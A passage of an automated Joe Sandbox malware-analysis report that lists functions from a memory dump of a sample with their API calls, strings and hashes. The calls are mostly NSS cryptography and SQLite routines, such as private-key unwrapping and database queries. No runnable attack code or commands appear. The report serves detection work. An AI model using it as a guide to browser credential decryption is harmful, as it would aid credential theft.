                                                            • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C9F4047
                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C9F40DE
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9F415F
                                                            • __allrem.LIBCMT ref: 6C9F416B
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9F4288
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9F42AB
                                                            • __allrem.LIBCMT ref: 6C9F42B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                            • String ID: %02d$%03d$%04d$%lld
                                                            • API String ID: 703928654-3678606288
                                                            • Opcode ID: c390903a67f5fee206e2a92c54460c86420b48a2103c14947f448b8d1a89c564
                                                            • Instruction ID: d4c66b26a0c2908658002601a9118808206bdbdba4da9399e76179d21f739c81
                                                            • Opcode Fuzzy Hash: c390903a67f5fee206e2a92c54460c86420b48a2103c14947f448b8d1a89c564
                                                            • Instruction Fuzzy Hash: 7AF14371A087409FE715CF38C981A6AB7FABF95308F148A2DF4A597B50E734D486CB42
                                                            Function 6C9A1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A1D58
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9A1EFD
                                                            • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C9A1FB7
                                                            Strings
                                                            • no more rows available, xrefs: 6C9A2264
                                                            • abort due to ROLLBACK, xrefs: 6C9A2223
                                                            • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C9A1F83
                                                            • unsupported file format, xrefs: 6C9A2188
                                                            • table, xrefs: 6C9A1C8B
                                                            • another row available, xrefs: 6C9A2287
                                                            • sqlite_temp_master, xrefs: 6C9A1C5C
                                                            • unknown error, xrefs: 6C9A2291
                                                            • sqlite_master, xrefs: 6C9A1C61
                                                            • attached databases must use the same text encoding as main database, xrefs: 6C9A20CA
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                            • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                            • API String ID: 563213449-2102270813
                                                            • Opcode ID: cee4ac97be36fae941e02e9cc160fff6101a7f22fa772d64a03a14e3d376f9c1
                                                            • Instruction ID: ce3a6f2ba5ceec7fc025786247f834330dacaa399a6d763c740436584829df9e
                                                            • Opcode Fuzzy Hash: cee4ac97be36fae941e02e9cc160fff6101a7f22fa772d64a03a14e3d376f9c1
                                                            • Instruction Fuzzy Hash: EE12E270608741CFD705CF5AC484A1AB7F6BF96318F18896DE8998BB51D731EC46CB82
                                                            Function 6CA2FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CA2FD06
                                                              • Part of subcall function 6CA2F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CA2F696
                                                              • Part of subcall function 6CA2F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CA2F789
                                                              • Part of subcall function 6CA2F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CA2F796
                                                              • Part of subcall function 6CA2F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CA2F79F
                                                              • Part of subcall function 6CA2F670: SECITEM_DupItem_Util.NSS3 ref: 6CA2F7F0
                                                              • Part of subcall function 6CA53440: PK11_GetAllTokens.NSS3 ref: 6CA53481
                                                              • Part of subcall function 6CA53440: PR_SetError.NSS3(00000000,00000000), ref: 6CA534A3
                                                              • Part of subcall function 6CA53440: TlsGetValue.KERNEL32 ref: 6CA5352E
                                                              • Part of subcall function 6CA53440: EnterCriticalSection.KERNEL32(?), ref: 6CA53542
                                                              • Part of subcall function 6CA53440: PR_Unlock.NSS3(?), ref: 6CA5355B
                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6CA2FDAD
                                                              • Part of subcall function 6CA5FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA09003,?), ref: 6CA5FD91
                                                              • Part of subcall function 6CA5FD80: PORT_Alloc_Util.NSS3(A4686CA6,?), ref: 6CA5FDA2
                                                              • Part of subcall function 6CA5FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CA6,?,?), ref: 6CA5FDC4
                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6CA2FE00
                                                              • Part of subcall function 6CA5FD80: free.MOZGLUE(00000000,?,?), ref: 6CA5FDD1
                                                              • Part of subcall function 6CA4E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA4E5A0
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA2FEBB
                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CA2FEC8
                                                            • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CA2FED3
                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA2FF0C
                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA2FF23
                                                            • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CA2FF4D
                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA2FFDA
                                                            • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CA30007
                                                            • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CA30029
                                                            • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA30044
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                            • String ID:
                                                            • API String ID: 138705723-0
                                                            • Opcode ID: 1a77d56d1d14aa106d599e9cc92d7c3efabce5730bfd8a52ebc0fe122772cdf2
                                                            • Instruction ID: 3080506377ddc5b5b3f5243d4bb99e2ef477b8fa01cdfa515a9b3bc693c6671a
                                                            • Opcode Fuzzy Hash: 1a77d56d1d14aa106d599e9cc92d7c3efabce5730bfd8a52ebc0fe122772cdf2
                                                            • Instruction Fuzzy Hash: 07B1C471604221AFE714CF29CC41A6BF7E5FF88308F588A1DE999C7A41E774E984CB91
                                                            Function 6CA27D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CA27DDC
                                                              • Part of subcall function 6CA607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA08298,?,?,?,6C9FFCE5,?), ref: 6CA607BF
                                                              • Part of subcall function 6CA607B0: PL_HashTableLookup.NSS3(?,?), ref: 6CA607E6
                                                              • Part of subcall function 6CA607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA6081B
                                                              • Part of subcall function 6CA607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA60825
                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CA27DF3
                                                            • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CA27F07
                                                            • PK11_GetPadMechanism.NSS3(00000000), ref: 6CA27F57
                                                            • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CA27F98
                                                            • PK11_FreeSymKey.NSS3(?), ref: 6CA27FC9
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA27FDE
                                                            • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CA28000
                                                              • Part of subcall function 6CA49430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CA27F0C,?,00000000,00000000,00000000,?), ref: 6CA4943B
                                                              • Part of subcall function 6CA49430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CA4946B
                                                              • Part of subcall function 6CA49430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CA49546
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA28110
                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CA2811D
                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CA2822D
                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA2823C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                            • String ID:
                                                            • API String ID: 1923011919-0
                                                            • Opcode ID: c7a05030f330ebe4b5edca6d9b5ab3663de309b490ecfe26be5389017d04df99
                                                            • Instruction ID: 747c2442451e18606327480a318b136dc75ae5eb32fb827c4278e2677bbd75c8
                                                            • Opcode Fuzzy Hash: c7a05030f330ebe4b5edca6d9b5ab3663de309b490ecfe26be5389017d04df99
                                                            • Instruction Fuzzy Hash: A6C171B1D002299BEB21CF14CD40FEAB7B9AF05308F0881E5E91DA6641E7359ED9CF61
                                                            Function 6CA51CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CA51F19
                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CA52166
                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CA5228F
                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CA523B8
                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA5241C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: memcpy$Error
                                                            • String ID: manufacturer$model$serial$token
                                                            • API String ID: 3204416626-1906384322
                                                            • Opcode ID: f939cc2a0e746b737736e8c3e55df458f10ff9c1b61f11996efd187608f08133
                                                            • Instruction ID: f3e71950b93e7a45a2953ddd9855f34a483bae8cb0b75cd5fc639b5080f70a80
                                                            • Opcode Fuzzy Hash: f939cc2a0e746b737736e8c3e55df458f10ff9c1b61f11996efd187608f08133
                                                            • Instruction Fuzzy Hash: FC0220A2D0C7C86EF7318A71C44C7E76AE09B45328F8C576EC6DE46A83C3B859D98351
                                                            Function 6CA56C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA01C6F,00000000,00000004,?,?), ref: 6CA56C3F
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CA01C6F,00000000,00000004,?,?), ref: 6CA56C60
                                                            • PR_ExplodeTime.NSS3(00000000,6CA01C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CA01C6F,00000000,00000004,?,?), ref: 6CA56C94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                            • String ID: gfff$gfff$gfff$gfff$gfff
                                                            • API String ID: 3534712800-180463219
                                                            • Opcode ID: 6882e8ce76ff16db83b17db155da2cdcc66180a2595977b52672c0cab8789ccb
                                                            • Instruction ID: 66b32975d3e22f46f5c069afb24c37b8b4f3dfba07b1cfd6935fc1b1cb90ce15
                                                            • Opcode Fuzzy Hash: 6882e8ce76ff16db83b17db155da2cdcc66180a2595977b52672c0cab8789ccb
                                                            • Instruction Fuzzy Hash: 51513B72B016494FC70CCDADDC527DABBDAABA4310F48C23AE842DB781D638D946C751
                                                            Function 6CA6BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CA6BD48
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CA6BD68
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CA6BD83
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CA6BD9E
                                                            • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CA6BDB9
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CA6BDD0
                                                            • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CA6BDEA
                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CA6BE04
                                                            • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CA6BE1E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: AlgorithmPolicy
                                                            • String ID:
                                                            • API String ID: 2721248240-0
                                                            • Opcode ID: 9b2b292853923cc516049823f13796cb1d941162832fb5f7e63594383f1af7b0
                                                            • Instruction ID: fd3c1d0037d8b6e0dc5900a3431c70b81accb665dc5f179cdf129d9768e08efa
                                                            • Opcode Fuzzy Hash: 9b2b292853923cc516049823f13796cb1d941162832fb5f7e63594383f1af7b0
                                                            • Instruction Fuzzy Hash: 182185B7E1429997FB004697FD43F8B32789B9174DF0C0214F927EEE82F710949896A6
                                                            Function 6CB18D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_CallOnce.NSS3(6CB614E4,6CACCC70), ref: 6CB18D47
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB18D98
                                                              • Part of subcall function 6C9F0F00: PR_GetPageSize.NSS3(6C9F0936,FFFFE8AE,?,6C9816B7,00000000,?,6C9F0936,00000000,?,6C98204A), ref: 6C9F0F1B
                                                              • Part of subcall function 6C9F0F00: PR_NewLogModule.NSS3(clock,6C9F0936,FFFFE8AE,?,6C9816B7,00000000,?,6C9F0936,00000000,?,6C98204A), ref: 6C9F0F25
                                                            • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CB18E7B
                                                            • htons.WSOCK32(?), ref: 6CB18EDB
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB18F99
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB1910A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                            • String ID: %u.%u.%u.%u
                                                            • API String ID: 1845059423-1542503432
                                                            • Opcode ID: cf75bffc9820c778533387ea46fbb0d48430a97bc675b8ba66823054784828ec
                                                            • Instruction ID: e74150a308a941e0b715f30f8fb3a5912c7ce3584f468dd20b8fec7454f06472
                                                            • Opcode Fuzzy Hash: cf75bffc9820c778533387ea46fbb0d48430a97bc675b8ba66823054784828ec
                                                            • Instruction Fuzzy Hash: 30027B32D492D18FDB14CF19C46876ABBA3EF42314F1A835AD8915BE91C332D989C791
                                                            Function 6CAD9D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C998637,?,?), ref: 6CAD9E88
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C998637), ref: 6CAD9ED6
                                                            Strings
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAD9EC0
                                                            • %s at line %d of [%.10s], xrefs: 6CAD9ECF
                                                            • database corruption, xrefs: 6CAD9ECA
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: _byteswap_ulongsqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 912837312-598938438
                                                            • Opcode ID: 5d585a0506302e218dee51524a34ec78aa7afe055ea84489b30197c52e59d3f1
                                                            • Instruction ID: e5917d17b99e158c157272e1eaeafc6a8bad877eb0b71d3a1e43fa2906ad5273
                                                            • Opcode Fuzzy Hash: 5d585a0506302e218dee51524a34ec78aa7afe055ea84489b30197c52e59d3f1
                                                            • Instruction Fuzzy Hash: 63819531B012168FCB04CFB9CA90ADEB3F6AF48304B598569D919AB741DB31ED85CB91
                                                            Function 6CB1CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB1D086
                                                            • PR_Malloc.NSS3(00000001), ref: 6CB1D0B9
                                                            • PR_Free.NSS3(?), ref: 6CB1D138
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: FreeMallocstrlen
                                                            • String ID: >
                                                            • API String ID: 1782319670-325317158
                                                            • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                            • Instruction ID: 4233838b72f4498399ac195a7f7e37decf1cccb36283ba6db5c72a22127604bf
                                                            • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                            • Instruction Fuzzy Hash: 29D15863B8D6D60FEB15487C98B13EA7793C782374F680339D1219BFE5E61988478342
                                                            Function 6CABAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb4a1692b35272ea23427676d4af4794f8959cb6381ef84a4a4f1746115f0f73
                                                            • Instruction ID: 79b07c76c663b722e8df3b7745a2504bf7aa046409c6fd6e87940e125503f8be
                                                            • Opcode Fuzzy Hash: eb4a1692b35272ea23427676d4af4794f8959cb6381ef84a4a4f1746115f0f73
                                                            • Instruction Fuzzy Hash: 06F1D071E012958BDB04CF29D9917BE77F9AB4A308F5D422DC905E7780EB78A981CBC0
                                                            Function 6C9F8EA0 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
